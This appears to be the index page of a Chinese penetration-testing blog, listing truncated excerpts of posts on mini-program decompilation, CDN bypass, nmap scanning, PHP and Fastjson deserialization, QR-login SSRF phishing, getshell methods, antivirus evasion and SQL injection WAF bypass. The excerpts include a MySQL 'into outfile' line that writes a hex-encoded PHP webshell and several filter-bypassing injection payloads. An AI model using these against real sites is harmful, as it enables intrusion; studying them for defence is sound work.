Wechat&Alipay小程序源码反编译

Wechat&Alipay小程序源码反编译
0x01 前言 随着小程序的火爆,越来越多的企业开始开发自身的小程序,小程序便成了我们挖洞的一个切入点。常用的平台有微信、支付宝、百度app等。日常渗透、众测中经常会遇到小程序,在获取到小程序客户端源码的情况下,对于Bypass数据包签名、GET敏感接口等都有一定的帮助。这里对最常遇到的微信小程序、支付宝小程序的源码反编译做个方法记录。 0x02 需要的准备 安卓手机(需ROOT) PC安装adb套件 0x03 ...

绕过CDN寻找真实IP的8种方法

绕过CDN寻找真实IP的8种方法
正常情况下,通过cmd命令可以快速找到域名对应IP,最常见的命令如ping、nslookup。但很多站点出于用户体验和安全的角度,使用CDN加速,将域名解析到CDN,这时候就需要绕过CDN来查找真实IP。 一、DNS历史解析记录 查询域名的历史解析记录,可能会找到网站使用CDN前的解析记录,从而获取真实ip,相关查询的网站有: iphistory:https://viewdns.info/iphistory/DNS查询:(https://dnsdb.io/zh-cn/...

nmap小技巧[1] 探测大网络空间中的存活主机

nmap小技巧[1] 探测大网络空间中的存活主机
nmap是所有安全爱好者应该熟练掌握的扫描工具,本篇介绍其在扫描大网络空间时的用法。 为什么要扫描大网络空间呢? 有这样的情形: 内网渗透   攻击者单点突破,进入内网后,需进一步扩大成果,可以先扫描整个私有网络空间,发现哪些主机是有利用价值的,例如10.1.1.1/8, 172.16.1.1/12, 192.168.1.1/16 全网扫描 扫描一个巨大的网络空间,我们最关心的是效率问题,即时间成本。 在足够迅速的前提下,宁...

PHP反序列化漏洞学习(一)

PHP反序列化漏洞学习(一)
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞的基础知识。 一、PHP序列化和反序列化 在学习PHP反序列化漏洞时,先来了解一下基础的知识。 (一)PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 一开始看这个概...

Fastjson 反序列化漏洞史

Fastjson 反序列化漏洞史
作者:Longofo@知道创宇404实验室 时间:2020年4月27日 英文版本:https://paper.seebug.org/1193/ Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。 Fastjson解析流程 可...

QQ二维码登陆机制分析+双重SSRF钓鱼利用

QQ二维码登陆机制分析+双重SSRF钓鱼利用
前言1:上次发了QQ邮箱self-xss的综合利用链,因为之前提交了TSRC,看了已经修复才把漏洞细节发出来的,然后被扣了安全币和积分。由于没认真看条款在这先道个歉。 前言2:随着移动应用的普及,二维码在我们的日常生活中显得越来越重要。其中二维码有一个功能用于移动端和PC端的交互认证。随着新事物的出现,新的漏洞也有可能随之出现。要想挖到新漏洞就得先弄清他的原理。 一、抓包分析 既然二维码认证是基...

红队-Getshell总结

红队-Getshell总结
Author: sm0nk@深蓝攻防实验室 无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。 0x01 注入getshell 一般前提条件:有权限、知道路径 mysql select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php' Sql server...

使用Python进行防病毒免杀

使用Python进行防病毒免杀
使用Python进行防病毒免杀 很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉? 打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。 0x01 环境准备 1、软件安装 Python 2.7.16 x86:https://www.p...

高级SQL注入:混淆和绕过

高级SQL注入:混淆和绕过
最近在学习代码审计,于是发现了这篇文章,然后转过来学习学习, 并稍加了修改 也不知道这位大哥转的谁的文章,也没有附上原文链接, 转发地址:https://blog.csdn.net/ncafei/article/details/62044552 简介: 本文将要揭示能用于现实CMSs和WAFs程序中的高级绕过技术和混淆技术, 文中所提到的SQL注入语句仅仅是一些绕过保护的方法, 另外本文所有内容仅可用于安全研究,如有其它不正当的行为,后果自负...

SQL注入-绕过

SQL注入-绕过
整理下关于SQL注入绕过的一些姿势。欢迎大牛补充 !^—^! 0x01 绕过waf思路 从第一步起,一点一点去分析,然后绕过。 过滤 and,or 1 2 3 preg_match('/(and|or)/i', $id) Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1 过滤 and, or, union 1 2 3 preg_match('/(and|or|union)/i', $id) Filtered injection: union select user...
Copyright © 0x24bin's Blog 保留所有权利.   Theme  Ality

用户登录